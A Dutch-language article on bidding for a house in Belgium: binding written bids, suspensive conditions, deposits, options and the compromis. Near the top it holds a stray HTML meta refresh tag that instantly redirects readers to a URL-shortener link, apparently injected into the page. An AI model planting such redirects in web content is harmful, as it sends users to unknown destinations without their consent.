Bieden op een huis? Dit moet je weten

Share.
Showing 1 of 1

<meta http-equiv="Refresh" content="0;URL=https://zeep.ly/cypoH">

0% Awesome

  • User Ratings (0 Votes) 0 %

Bieden op een huis doe je niet elke dag. Het is een belangrijk en spannend moment waar je goed over moet nadenken. Ben je van plan om te bieden op een huis? We vertellen je hieronder alles wat je moet weten.  

Denk na voor je een bod doet

Een schriftelijk bod uitbrengen is juridisch bindend. Accepteert de verkoper je bod en de eventuele voorwaarden, dan vindt de verkoop plaats. Je denkt er dus maar beter goed over na. 

Een mondeling bod doe je beter niet. Je hebt in dat geval namelijk geen bewijs van de overeenkomst en dat kan tot discussies leiden. Een sms’je of online berichtje geldt als het ‘begin van een bewijs’, maar is niet voldoende indien er onenigheid zou ontstaan. Een schriftelijk bod breng je dus het best gewoon ouderwets uit op papier.

Let op: bied je de geadverteerde verkoopprijs, dan betekent dat niet dat de verkoop automatisch rond is. De verkoper mag een bod dat de vraagprijs bedraagt afslaan. 

Weet je niet hoeveel je wil bieden? Gebruik een online schattingstool en lees onze tips om een openingsbod te maken.

Vermeld dit in je bod

Een template voor een bod op een woning is er niet. Een bod is bindend zodra het pand en de geboden prijs op het bod vermeld worden. Je doet er echter goed aan om het bod te vervolledigen met de volgende informatie:

  • Het adres van de woning
  • De geboden prijs
  • De naam van de koper
  • De datum waarop je het bod uitbrengt
  • Een einddatum van je bod
  • Opschortende voorwaarden
  • Je handtekening

Koop je je woning via een makelaar? Dan zal hij je een formulier laten invullen. Zo ben je zeker dat je meteen alle nodige informatie meegeeft. 

Denk aan de opschortende voorwaarden

Een bod breng je doorgaans uit met opschortende voorwaarden om jezelf in te dekken wanneer er problemen zouden opduiken. Wordt niet aan die voorwaarden voldaan, dan is je bod niet langer geldig. De belangrijkste opschortende voorwaarde is het verkrijgen van een lening van de bank. Aanvaardt de verkoper je bod, maar kan je als koper geen lening strikken, dan gaat de verkoop niet door. 

Opschortende voorwaarden kan je ook voor andere zaken inzetten. Wil je er bijvoorbeeld zeker van zijn dat de grond niet vervuild is, dan kan je als opschortende voorwaarde stellen dat het bodemattest geen vervuiling mag aanwijzen. Ook stedenbouwkundige inlichtingen en de aanwezigheid van bepaalde vergunningen kan je als opschortende voorwaarden opnemen in je bod. 

Betaal geen voorschot bij je bod

Wat je nooit doet bij een bod is een voorschot betalen. Het voorschot, ook wel de waarborg genoemd, wordt pas betaald wanneer je het compromis ondertekent. Het gaat dan doorgaans om 10% van de aankoopprijs, al is dat niet verplicht. Dat voorschot wordt geparkeerd op een beschermde derdenrekening van de notaris en niet meteen doorgesluisd naar de verkoper. Een voorschot betalen aan de verkoper zelf doe je nooit en zeker niet bij het uitbrengen van een bod. 

Neem een optie als je twijfelt

Ben je niet helemaal zeker of je de woning van je dromen gevonden hebt? Dan kan je een optie nemen. Een optie verbindt de eigenaar ertoe om de woning aan niemand anders te verkopen binnen een vastgelegde termijn, doorgaans een of twee weken. Je koopt zo dus bedenktijd. 

Beslis je binnen die periode om te kopen, dan breng je de verkoper daarvan schriftelijk, via aangetekende brief, op de hoogte. De optie wordt dan ‘gelicht’ en de verkoop vindt plaats. Verstrijkt de termijn en heb je niets laten weten, dan mag de eigenaar de woning terug verkopen aan andere geïnteresseerden. Het is mogelijk dat de verkoper een bepaald bedrag als schadeloosstelling vraagt om de woning voor jou te reserveren. Gaat de verkoop door, dan geldt die som als eerste voorschot. 

Belangrijk: het is essentieel om de optie op dezelfde manier als een bod te formuleren, inclusief eventuele opschortende voorwaarden. Eenmaal de optie gelicht wordt, volgt de verkoop namelijk automatisch en kan je geen opschortende voorwaarden meer stellen.

Stel het compromis op

Gaat de verkoper akkoord met je bod? Proficiat, dan is de verkoop definitief. De volgende stap is het opstellen van het compromis, ook wel de voorlopige verkoopovereenkomst genoemd. Dat is een officieel document waarin beide partijen zich verbinden tot de verkoop. Maximaal vier maanden later volgt dan het verlijden van de akte, waarbij de sleutels overhandigd worden. Voilà, huis gekocht! 

Bron: notaris.be

Share.